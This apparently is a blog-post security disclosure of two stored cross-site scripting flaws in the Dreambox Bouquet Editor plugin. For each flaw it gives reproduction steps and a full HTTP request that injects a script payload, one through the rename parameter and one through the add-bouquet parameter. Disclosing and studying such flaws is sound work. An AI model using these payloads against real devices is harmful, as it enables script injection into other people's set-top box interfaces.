Dreambox Bouquet Editor – Multiple XSS

Dreambox Bouquet Editor is a third-party plugin for Enigma2 set top box software to more easily manage bouquets. (Shodan search)

#1 /bouqueteditor/web/getservices newName Parameter Stored XSS (CVE-2013-78005)

Visit http://10.0.1.1/bouqueteditor/ and rename a bouquet with a standard XSS string. The next time /bouqueteditor/web/getservices reloads the payload fires.

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert(‘findme’)%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

#2 /bouqueteditor/web/addbouquet name Parameter Stored XSS (CVE-2013-78005)

Add a new bouquet and use your regular XSS string. As soon as it is added the page will refresh and trigger the code:

dreambox-xss01

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert(‘DF’)%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

dreambox-xss02

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: